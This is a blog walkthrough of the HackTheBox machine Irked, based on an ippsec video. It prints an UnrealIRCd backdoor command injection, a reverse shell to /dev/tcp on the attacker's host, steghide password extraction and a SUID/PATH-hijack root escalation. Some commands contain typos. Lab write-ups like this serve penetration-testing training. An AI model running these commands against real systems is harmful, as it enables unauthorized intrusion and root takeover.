Dissection of ippsec’s youtube video HackTheBox - Irked (Fixed). Box includes enumeration to UnrealIRCd server, stenography and tools, SUID stickybit that leads to root escalation.

Legal Usage: The information provided by execute@will is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.

By continued reading, you acknowledge the aforementioned user risks/responsibilities.

This series of write-up will contain comprehensive write-ups of hackthebox machines. In an effort to sharpen reporting techniques and help solidify the understand and methodologies used during penetration testing.

YouTube Link: https://www.youtube.com/watch?v=OGFTM_qvtVI

Enumeration

Nmap scan

1	`nmap -sC -sV -oA nmap/irked 10.10.10.117`

web-server

Check out web-server on port 80

since it says IRC move to perform full scan of box

full nmap scan

1	`nmap -vvv -p- 10.10.10.117`

return to web-webserver

check out robots.txt

doesn’t exisit

check for ~root - some apache servers allow this (old/not very often)

run gobuster

gobuster -u http://10.10.10.117 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -o root.log

return to web-server

check /index.html

we get this main page. Establishing that the target is html.

try index.aspx

try Default.aspx

return to gobuster

discovered /manual

check out /manual

gives default apache page. Copywrite is 2014 which could me its old.

nmap full port scan

returned an open port of 8067

Begin to enumerate what this port is with nmap:

1	`nmap -sC -sV -p 8067 10.10.10.10.117`

port is open with UnrealIRCd.

connect to port 8067 with ncat

1	`ncat 10.10.10.117 8067`

since using the hostname we need to edit the ‘hosts’ on our local box to reflect

edit host file:

1	`vi /etc/hosts`

check that hostname works with firefox and for any virtual host routing issues.

google “RFC IRC”

connect to IRC with ncat and pass the parameters

PASS ippsec
NICK ippsec
USER ippsec PleaseSubscribe AndComment :ippsec

Search for unrealirc change log for version name

end up finding multiple vulnerabilities

searchsploit UnrealIRC

1	`searchsploit unreal`

metasploit backdoor command execution identified.

google “unrealirc backdoor” leads to Link: https://lwn.net/Articles/392201/ which describes exactly how the exploit works.

nutshell: Backdoor disguised to look like debug code:

moving forward without metasploit as now know how the exploit functions.

Setup tcpdump pipe to UnrealIRC

1	`tcpdump -i tun0 icmp`

setup ping to UnrealIrc:

1	`echo "AB; ping -c 1 10.10.14.3" \| ncat 10.10.10.117 8067`

after connection to IRC timed out we got an execution of the ping (ICMP) that was captured on tcpdump.

Command Execution

from the realization that a ping can be sent via the “AB” exploit now move to create a reverse shell

setup listener & send reverse shell

1	`ncat -lvnp 9001`

reverse shell via IRC:

1	`echo "AB; bash -i >& /dev/tcp/10.10.14.3/9001 0>&1" \| ncat 10.10.10.117 8067`

wait for timeout… which didn’t result in a shell.

retry but putting bash ' within the command just incase system is linked to nsh or dash

echo "AB;  bash 'bash -i >& /dev/tcp/10.10.14.3/9001 0>&1'" | ncat 10.10.10.117 8067

connection established and reverse shell.

upgrade shell

python -c 'import pty;pty.spawn("/bin/bash")'
background with ctrl+z
stty raw -echo
fg (enter) (enter)

export TERM=xterm

Enumerate box

print working directory

pwd ![](https://paper-attachments.dropbox.com/s_ECCB58BFC7B8C7FB4F76DF55CC98C0E5842EECCD8EA52152FDA61793F88C4ED5_1556514916306_image.png)

search directory:

check .bash_history file:

1	`cat .bash_history \| less`

found a cd djmardov

navigate to cd djmardov

check when kernal was compiled: uname -a

check for hidden files find . -ls

quite a few permission denied. find . -ls -type f

more permission denied.

discovered user.txt

check /Documents

we can not read because we are not djmardov

there is a .backup

and now we have a backup password for some stenography.

there has only been one image on this box the entire time and so now download locally

1	`curl http://10.10.10.117/irked.jpg -o irked.jpg`

use steghide

if not installed download via:

1	`apt install steghide`

most commonly use on CTFs:

1	`steghide extract -sf irked.jp -p upUPdownDOWNdownLRlrBAbaSSss`

ouputted a password file and a string

Priv-Esc

SSH Attempt as djmardov

1 2	`ssh [email protected] (password: above string)`

check files

ls -al

Looking for anything obvious.

return to user.txt

1	`find . \| grep -i user.txt`

Enumeration with LinEnum

create local web server hosting the LinEnum

1	`python -m SimpleHTTPServer`

execute

1	`bash LinEnum.sh`

SUID files that stick out have last been modified in “2018”

exim4 = mail server viewuser = interesting prospect

viewuser binary

Check SUID/sticky bit on /usr/bin/viewuser

1	`ls -la /usr/bin/viewuser`

indeed this binary has the ability to run as root.

Test the functionality of viewuser

copy binary off remote box via base64

1	`base64 -w0 /usr/bin/viewuser`

(copy to clipboard)

decode base64 locally:

1	`base64 -d viewuser.b64 > viewuser`

-could have been opened with Ghidra or Ida Pro opting to use strace

strace = list all sys calls

1	`strace ./viewuser`

(difficult to read)

ltrace = another sys call outputer

1	`ltrace ./viewuser`

the system(call) uses the variable “who” with no full path included which could lead to an entry to overwrite value. Which afterword changes the SUID and executes */tmp/listusers*.

Modify /tmp/listusers (target box)

#!/bin/bash
echo "Sending a shell"
/bin/bash

change chmod to executable

1	`chmod +x /tmp/listusers`

which if executed launches a shell

Return to viewusers who en turn will execute this file should launch a bash shell as root.

1	`viewusers`

secondary exploit of “who” statement

what should be seen is “/usr/bin/who”

Locate who

1	`which who`

change PATH

export PATH=/dev/shm:$PATH
echo $PATH

now we can edit who

vi who
(insert above /bin/bash)
#!/bin/bash
echo "Sending a shell"
/bin/bash